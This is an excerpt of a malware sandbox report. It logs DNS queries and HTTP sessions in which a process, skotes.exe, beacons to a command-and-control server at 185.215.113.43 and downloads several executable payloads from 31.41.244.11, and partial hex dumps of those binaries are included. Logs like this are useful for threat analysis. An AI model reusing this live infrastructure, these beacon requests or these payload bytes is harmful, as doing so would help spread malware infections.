                                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                          Dec 18, 2024 09:07:16.090147018 CET1.1.1.1192.168.2.80xbcb8No error (0)pancakedipyps.click104.21.23.76A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 18, 2024 09:07:16.090147018 CET1.1.1.1192.168.2.80xbcb8No error (0)pancakedipyps.click172.67.209.202A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 18, 2024 09:07:43.178621054 CET1.1.1.1192.168.2.80xa03fName error (3)sweepyribs.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 18, 2024 09:07:43.556766033 CET1.1.1.1192.168.2.80xe023No error (0)grannyejh.lat172.67.179.109A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 18, 2024 09:07:43.556766033 CET1.1.1.1192.168.2.80xe023No error (0)grannyejh.lat104.21.64.80A (IP address)IN (0x0001)false
                                                                                                                                                                                          • pancakedipyps.click
                                                                                                                                                                                          • grannyejh.lat
                                                                                                                                                                                          • 185.215.113.43
                                                                                                                                                                                          • 31.41.244.11
                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          0192.168.2.849709185.215.113.43806840C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          Dec 18, 2024 09:07:04.713125944 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                          Content-Length: 4
                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                          Data Raw: 73 74 3d 73
                                                                                                                                                                                          Data Ascii: st=s
                                                                                                                                                                                          Dec 18, 2024 09:07:06.025878906 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                          Date: Wed, 18 Dec 2024 08:07:05 GMT
                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          Refresh: 0; url = Login.php
                                                                                                                                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                          Data Ascii: 1 0


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          1192.168.2.849710185.215.113.43806840C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          Dec 18, 2024 09:07:07.670543909 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                          Content-Length: 156
                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                          Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 31 32 39 37 35 42 34 35 46 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                          Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB12975B45F82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                          Dec 18, 2024 09:07:09.579338074 CET594INHTTP/1.1 200 OK
                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                          Date: Wed, 18 Dec 2024 08:07:09 GMT
                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          Data Raw: 31 39 33 0d 0a 20 3c 63 3e 31 30 31 36 38 35 31 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 63 64 37 65 38 36 34 34 30 33 61 63 35 32 65 61 34 38 34 62 34 31 31 62 39 64 63 34 65 31 23 31 30 31 36 38 35 32 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 63 39 36 61 38 30 35 31 34 35 62 30 30 32 61 62 35 65 34 35 34 32 35 31 39 37 64 31 61 61 31 64 61 61 61 38 23 31 30 31 36 38 35 33 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 64 65 37 31 39 62 35 30 35 39 62 62 30 30 61 62 35 65 34 35 34 32 35 31 39 37 64 31 61 61 31 64 61 61 61 38 23 31 30 31 36 38 35 34 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 [TRUNCATED]
                                                                                                                                                                                          Data Ascii: 193 <c>1016851001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbcd7e864403ac52ea484b411b9dc4e1#1016852001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbc96a805145b002ab5e45425197d1aa1daaa8#1016853001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbde719b5059bb00ab5e45425197d1aa1daaa8#1016854001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbcf70964e03ac52ea484b411b9dc4e1#<d>0


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          2192.168.2.84971131.41.244.11806840C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          Dec 18, 2024 09:07:09.704662085 CET59OUTGET /files/fate/random.exe HTTP/1.1
                                                                                                                                                                                          Host: 31.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.027827978 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                          Date: Wed, 18 Dec 2024 08:07:10 GMT
                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                          Content-Length: 776832
                                                                                                                                                                                          Last-Modified: Tue, 17 Dec 2024 09:45:14 GMT
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          ETag: "6761482a-bda80"
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 09 00 a3 1e 60 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 00 00 aa 01 00 00 c0 00 00 00 00 00 00 52 59 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 0c 00 00 08 00 00 00 00 00 00 03 00 40 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 37 02 00 3c 00 00 00 00 a0 02 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 ac 0b 00 80 2e 00 00 00 b0 02 00 40 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 fe 01 00 18 00 00 00 e8 cd 01 00 c0 00 00 00 00 00 00 00 00 00 00 00 28 39 [TRUNCATED]
                                                                                                                                                                                          Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL`g"RY@@7<.@X(9T.text `.rdata$@@.datal"P>@.bsSST `.tlsV@.rsrcX@@.reloc@Z@B.bsst@.bssp@
                                                                                                                                                                                          Dec 18, 2024 09:07:11.027890921 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                          Dec 18, 2024 09:07:11.027926922 CET1236INData Raw: ec 30 8b 5c 24 44 a1 c0 57 42 00 31 e0 89 44 24 2c 8b 43 3c 8b 6c 18 78 8b 44 1d 18 85 c0 0f 84 4f 01 00 00 8b 4c 1d 20 01 d9 89 4c 24 08 48 89 44 24 10 c7 04 24 00 00 00 00 89 5c 24 04 89 6c 24 0c 8b 44 24 08 8b 30 01 de 0f 57 c0 f2 0f 11 44 24
                                                                                                                                                                                          Data Ascii: 0\$DWB1D$,C<lxDOL L$HD$$\$l$D$0WD$$WD$V(w"|$$D$(WVt$VfSCErPPD$|$$l$(WVPe\$Dl$t$h5Vm
                                                                                                                                                                                          Dec 18, 2024 09:07:11.027982950 CET1236INData Raw: f0 68 6d 64 85 93 ff 35 6c 64 42 00 e8 16 fb ff ff 83 c4 08 89 45 e4 8b 55 e4 ff d2 bb 49 05 00 00 be 11 50 42 00 6a 11 68 00 50 42 00 53 56 e8 96 fc ff ff 83 c4 10 6a 0a 68 00 c0 41 00 57 8b 7d 08 57 e8 82 fc ff ff 83 c4 10 68 01 dc af 8a ff 35
                                                                                                                                                                                          Data Ascii: hmd5ldBEUIPBjhPBSVjhAW}Wh5ldBMQj@SVuM11^_[]}uVPB'jT9BUSWV,\$@WB1D$(d=0w@ldBhb-/5ldBE(AD$
                                                                                                                                                                                          Dec 18, 2024 09:07:11.028016090 CET1236INData Raw: 42 00 31 e0 89 44 24 08 8b 01 8b 40 04 8b 7c 01 38 85 ff 74 48 89 e3 89 d9 56 e8 1a ff ff ff 80 7b 04 00 74 31 8b 07 89 f9 ff 50 34 83 f8 ff 0f 94 c0 8b 0e 8b 51 04 8d 0c 16 83 7c 16 38 00 0f 94 c4 08 c4 0f b6 c4 c1 e0 02 0b 44 16 0c 6a 00 50 e8
                                                                                                                                                                                          Data Ascii: B1D$@|8tHV{t1P4Q|8DjPnL$1^_[WV D$,WB1T$A#AuL$1 ^_|$0t1PP?BBDBD@Bt$RWhABV?
                                                                                                                                                                                          Dec 18, 2024 09:07:11.028048992 CET1236INData Raw: 78 01 81 ff 00 10 00 00 72 14 8b 51 fc 83 c1 fc 29 d1 83 f9 20 73 33 83 c0 24 89 c7 89 d1 57 51 e8 49 0a 00 00 83 c4 08 c7 06 5c c3 41 00 8b 4c 24 18 31 e1 e8 74 0a 00 00 89 f0 83 c4 1c 5e 5f 5b 5d c2 0c 00 e8 fd f8 ff ff e8 00 95 00 00 55 89 e5
                                                                                                                                                                                          Data Ascii: xrQ) s3$WQI\AL$1t^_[]USWV0WB1EUP WCWCzzrMw{C JUCE@rP|P\C{MK GWuP
                                                                                                                                                                                          Dec 18, 2024 09:07:11.028084040 CET1236INData Raw: 00 00 00 83 c4 04 8b 10 89 c1 56 ff 52 20 89 c3 8b 4f 04 85 c9 74 11 8b 01 ff 50 08 85 c0 74 08 8b 10 89 c1 6a 01 ff 12 8b 4c 24 08 31 e1 e8 a6 05 00 00 89 d8 83 c4 0c 5e 5f 5b c2 04 00 53 57 56 83 ec 0c 8b 74 24 1c a1 c0 57 42 00 31 e0 89 44 24
                                                                                                                                                                                          Data Ascii: VR OtPtjL$1^_[SWVt$WB1D$L$j|dB$eBdPu3u-VPt94$VP<$=|dBL$bL$1^_[WVWB1D$9u&j
                                                                                                                                                                                          Dec 18, 2024 09:07:11.028178930 CET108INData Raw: 68 6a b8 41 00 e8 be 01 00 00 59 c3 56 57 6a 01 e8 33 5e 00 00 59 bf 10 66 42 00 8b f0 8b cf e8 0d 0f 00 00 6a 00 56 8b cf c7 05 10 66 42 00 cc cb 41 00 e8 69 1a 00 00 68 74 b8 41 00 e8 86 01 00 00 59 5f 5e c3 6a 01 6a 00 68 10 66 42 00 b9 c0 65
                                                                                                                                                                                          Data Ascii: hjAYVWj3^YfBjVfBAihtAY_^jjhfBeBh~AeYeB
                                                                                                                                                                                          Dec 18, 2024 09:07:11.028209925 CET1236INData Raw: 1c 00 00 b9 cc 69 42 00 e8 ef 03 00 00 68 88 b8 41 00 e8 45 01 00 00 59 c3 68 92 b8 41 00 e8 39 01 00 00 59 c3 55 8b ec eb 0d ff 75 08 e8 a9 65 00 00 59 85 c0 74 0f ff 75 08 e8 28 a0 00 00 59 85 c0 74 e6 5d c3 83 7d 08 ff 0f 84 f2 20 00 00 e9 31
                                                                                                                                                                                          Data Ascii: iBhAEYhA9YUueYtu(Yt]} 1UuY]UEV AtjVYY^]U];WBu!UVWdBW09Bu>u&}>td,dBWBW0:B_
                                                                                                                                                                                          Dec 18, 2024 09:07:11.028249025 CET224INData Raw: ec 56 6a 00 6a 00 e8 93 9b 00 00 8b 75 08 85 c0 59 59 b9 53 03 42 00 0f 45 c8 51 8d 4e 24 e8 41 00 00 00 8b 45 0c 85 c0 74 0a 50 6a 00 e8 6c 9b 00 00 59 59 85 c0 b9 88 0e 42 00 0f 45 c8 51 8d 4e 2c e8 1d 00 00 00 5e 5d c3 55 8b ec 8b 45 08 83 78
                                                                                                                                                                                          Data Ascii: VjjuYYSBEQN$AEtPjlYYBEQN,^]UEx$tp$j>YY]USW}9;t>;t3Y#t*?VtF>u+FVYtVWPH^_[]VV(A?~YtvKYfA
                                                                                                                                                                                          Dec 18, 2024 09:07:11.148468018 CET1236INData Raw: 00 5e c3 55 8b ec 51 6a 20 e8 63 fa ff ff 89 45 fc 59 85 c0 74 0c ff 75 08 8b c8 e8 77 00 00 00 c9 c3 33 c0 c9 c3 55 8b ec 51 51 53 57 6a 00 8d 4d f8 e8 c1 fd ff ff 8b 45 08 8b 78 0c 8d 58 08 85 ff 74 3f 56 8b 03 4f 8b 04 b8 89 45 fc 85 c0 74 2c
                                                                                                                                                                                          Data Ascii: ^UQj cEYtuw3UQQSWjMExXt?VOEt,p7BMEtj17BMu^3YM_[UQE3VhBuNF(AVVVFQ^UVEtj VYY


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          3192.168.2.849712185.215.113.43806840C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          Dec 18, 2024 09:07:14.902106047 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                          Content-Length: 31
                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                          Data Raw: 64 31 3d 31 30 31 36 38 35 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                          Data Ascii: d1=1016851001&unit=246122658369
                                                                                                                                                                                          Dec 18, 2024 09:07:16.245498896 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                          Date: Wed, 18 Dec 2024 08:07:16 GMT
                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                          Data Ascii: 4 <c>0


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          4192.168.2.84971431.41.244.11806840C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          Dec 18, 2024 09:07:16.367350101 CET62OUTGET /files/burpin1/random.exe HTTP/1.1
                                                                                                                                                                                          Host: 31.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:17.690732956 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                          Date: Wed, 18 Dec 2024 08:07:17 GMT
                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                          Content-Length: 4438776
                                                                                                                                                                                          Last-Modified: Tue, 10 Dec 2024 00:01:52 GMT
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          ETag: "675784f0-43baf8"
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Data Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 50 45 00 00 4c 01 04 00 ce 3f c3 4f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 08 00 00 90 01 00 00 96 00 00 00 00 00 00 5f 94 01 00 00 10 00 00 00 a0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 02 00 00 02 00 00 e7 a4 44 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 c9 01 00 c8 00 00 00 00 30 02 00 10 4f 00 00 00 00 00 00 00 00 00 00 10 7b 43 00 e8 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 01 00 6c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                          Data Ascii: MZ`@`!L!Require Windows$PEL?O_@D0O{C?l.text `.rdata;<@@.dataM@.rsrcO0P@@U`AS3;VWtf9bAt`APPPYnj'@uv=A6PP9^]v8^3hAPPPxAEE;FrP~Y6jtAt$DV%sAF8^jqA39`At@9D$tt$Ph5XAA3D$`|$u@3pAt$D$t$`A/@t$PQ%`A3T$L$fAABBfuL$3f9t@f<Aut$TAL$%S\$VC;^tLW3
                                                                                                                                                                                          Dec 18, 2024 09:07:17.690828085 CET1236INData Raw: c9 6a 02 5a 8b c3 f7 e2 0f 90 c1 f7 d9 0b c8 51 e8 94 80 01 00 8b f8 33 c0 39 46 08 59 7e 1d 39 46 04 7e 10 8b 0e 66 8b 0c 41 66 89 0c 47 40 3b 46 04 7c f0 ff 36 e8 68 80 01 00 59 8b 46 04 89 3e 66 83 24 47 00 89 5e 08 5f 5e 5b c2 04 00 56 8b f1
                                                                                                                                                                                          Data Ascii: jZQ39FY~9F~fAfG@;F|6hYF>f$G^_^[Vv\IY^oUQQAuVjjEP5A|At>E;Ew6rE;Es,j*P*YYtlAj@ AEPjh5XAA3D$tlA
                                                                                                                                                                                          Dec 18, 2024 09:07:17.690864086 CET1236INData Raw: 3b f3 74 06 8b 06 56 ff 50 08 33 c0 40 eb 25 e8 a7 fe ff ff 8d 4d e0 8b f8 e8 bb 0e 01 00 8b 06 56 ff 50 08 8b c7 eb 0c 3b f3 74 06 8b 06 56 ff 50 08 33 c0 5e 5f 5b c9 c3 56 8b f1 c7 46 04 60 c3 41 00 83 66 08 00 c7 06 34 a5 41 00 c7 46 04 24 a5
                                                                                                                                                                                          Data Ascii: ;tVP3@%MVP;tVP3^_[VF`Af4AF$AfNf$N(^Uh$AuYYtEP#UPQ3hAudYYu@]Vv({F$YtPQvzvYtVP^l$
                                                                                                                                                                                          Dec 18, 2024 09:07:17.691036940 CET1236INData Raw: 7d c4 0f 84 d0 02 00 00 66 83 7d c4 08 0f 85 c5 02 00 00 ff 75 cc 8d 4d f0 e8 76 f8 ff ff 8d 45 f0 50 8d 46 10 50 8d 45 e4 50 8d 5e 28 e8 1f fc ff ff 83 c4 0c 50 8b cb e8 90 f8 ff ff ff 75 e4 e8 b6 76 01 00 39 7d 14 59 0f 85 6f 02 00 00 8b 46 0c
                                                                                                                                                                                          Data Ascii: }f}uMvEPFPEP^(Puv9}YoFURjuf}f}PQ;EtMu{v}Y^f9}u~@-f}t jeVPMXuFvY,EF@FURjuPQ;Eu3f9}URjuF<F
                                                                                                                                                                                          Dec 18, 2024 09:07:17.691093922 CET1236INData Raw: a2 41 00 8b f8 3b fe 74 33 56 6a 01 6a 01 57 ff 15 a4 a2 41 00 56 56 56 8d 45 e4 50 ff 15 a8 a2 41 00 8d 45 e4 50 ff 15 ac a2 41 00 6a 01 57 ff 15 b0 a2 41 00 57 ff 15 b4 a2 41 00 5f 5e c9 c3 53 ff 74 24 08 ff 15 94 a2 41 00 8b d8 85 db 75 02 5b
                                                                                                                                                                                          Data Ascii: A;t3VjjWAVVVEPAEPAjWAWA_^St$Au[VW|$Wt$A5AWSWS_3^@[UDSVWjpA5XAAPuuSuhuuSt&utWS\AWS`AtPdAz=Auo5h
                                                                                                                                                                                          Dec 18, 2024 09:07:17.691131115 CET1236INData Raw: 59 8b 4d fc 41 51 50 89 45 f8 8d 45 98 50 ff d3 3b 45 fc 77 40 ff d7 85 c0 75 3a 8b 86 bc e0 41 00 85 c0 74 25 8b 7d f8 57 50 ff 15 2c a1 41 00 85 c0 74 13 ff b6 bc e0 41 00 e8 14 6d 01 00 89 be bc e0 41 00 eb 16 57 eb 0e 8b 45 f8 89 86 bc e0 41
                                                                                                                                                                                          Data Ascii: YMAQPEEP;Ew@u:At%}WP,AtAmAWEAulYuAAAA9t;AuS0AG3jZGQl=AYAu:%AjXPAhP4A~XP
                                                                                                                                                                                          Dec 18, 2024 09:07:17.691168070 CET1236INData Raw: 20 a1 41 00 85 c0 74 37 8b 4d d4 33 c0 3b c8 77 2e 72 08 8b 45 d0 3b 45 08 73 24 6a 2b e8 70 fa ff ff 50 e8 86 6b 00 00 83 f8 01 59 59 74 09 83 0d c8 e9 41 00 ff eb ae 83 0d c8 e9 41 00 02 33 c0 40 c9 c3 ff 74 24 04 e8 8d ff ff ff 85 c0 59 75 01
                                                                                                                                                                                          Data Ascii: At7M3;w.rE;Es$j+pPkYYtAA3@t$Yujht$jAt$jYu%8AV3Wt$FFYW.t$6YY~_^D$V;F|P^VWt$YWFt$AP
                                                                                                                                                                                          Dec 18, 2024 09:07:17.691524982 CET108INData Raw: e8 c0 e2 ff ff 66 83 24 46 00 59 89 45 f8 8d 45 f4 50 8b cf e8 64 e5 ff ff 56 e8 8c 63 01 00 59 5b 5f 5e c9 c3 55 8b ec b8 20 10 00 00 e8 cf 63 01 00 53 56 57 8b 7d 08 8b 07 33 db 53 53 53 53 57 ff 50 10 8b 45 14 ff 75 0c 8b 35 30 a1 41 00 89 58
                                                                                                                                                                                          Data Ascii: f$FYEEPdVcY[_^U cSVW}3SSSSWPEu50AXuEE3]]
                                                                                                                                                                                          Dec 18, 2024 09:07:17.691556931 CET1236INData Raw: 89 5d f0 eb 03 8b 7d 08 8b 07 8d 4d e4 51 b9 00 10 00 00 2b ce 51 8d 8c 35 e0 ef ff ff 51 57 ff 50 0c 85 c0 0f 85 ca 00 00 00 8b 45 e4 3b c3 0f 84 bf 00 00 00 03 f0 8d 85 e0 ef ff ff 33 ff 89 45 f8 38 5d ff 8b c6 74 3d 2b 45 e8 3b f8 77 60 ff 75
                                                                                                                                                                                          Data Ascii: ]}MQ+Q5QWPE;3E8]t=+E;w`uuubE:EtuMvGE+E;w#uuubuEEE+}V=]PP<A9]w}"M39Y
                                                                                                                                                                                          Dec 18, 2024 09:07:17.691591978 CET1236INData Raw: 01 50 50 8b cf e8 97 f6 ff ff 50 ff 74 24 18 ff 15 c4 a2 41 00 8b 07 66 83 24 70 00 89 77 04 8b c7 5f 5e c3 55 8b ec 83 ec 74 53 56 8b 75 08 57 6a 40 8d 45 8c 50 56 ff 15 9c a2 41 00 85 c0 74 49 68 f8 a5 41 00 8d 45 8c 50 ff 15 48 a1 41 00 85 c0
                                                                                                                                                                                          Data Ascii: PPPt$Af$pw_^UtSVuWj@EPVAtIhAEPHAu6jV|Au)EVPvjhAutu]Y3_^[VA3;EthAhAEPVYYVAhAE+ESSWuPE+EPuuhPhAh
                                                                                                                                                                                          Dec 18, 2024 09:07:17.810664892 CET1236INData Raw: 04 46 89 75 fc 68 e9 fd 00 00 8d 45 e0 50 8d 45 bc 50 e8 e4 f4 ff ff 83 c4 0c 50 8d 4d b0 e8 46 db ff ff ff 75 bc e8 6c 59 01 00 8d 45 b0 50 e8 c5 f7 ff ff 59 59 68 c4 a6 41 00 ff 75 a4 ff 15 24 a1 41 00 85 c0 75 14 6a 3d ff 75 b0 e8 6e ed 00 00
                                                                                                                                                                                          Data Ascii: FuhEPEPPMFulYEPYYhAu$Auj=unYY39AAt&6AP6u4At9u9u Suu;tuHMEP?MM!iuX+uuuuW


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          5192.168.2.849719185.215.113.43806840C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          Dec 18, 2024 09:07:27.044841051 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                          Content-Length: 31
                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                          Data Raw: 64 31 3d 31 30 31 36 38 35 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                          Data Ascii: d1=1016852001&unit=246122658369
                                                                                                                                                                                          Dec 18, 2024 09:07:28.376029015 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                          Date: Wed, 18 Dec 2024 08:07:28 GMT
                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                          Data Ascii: 4 <c>0


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          6192.168.2.84972031.41.244.11806840C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          Dec 18, 2024 09:07:28.498786926 CET62OUTGET /files/unique3/random.exe HTTP/1.1
                                                                                                                                                                                          Host: 31.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:29.827635050 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                          Date: Wed, 18 Dec 2024 08:07:29 GMT
                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                          Content-Length: 1997824
                                                                                                                                                                                          Last-Modified: Wed, 18 Dec 2024 07:16:03 GMT
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          ETag: "676276b3-1e7c00"
                                                                                                                                                                                          Accept-Ranges: bytes
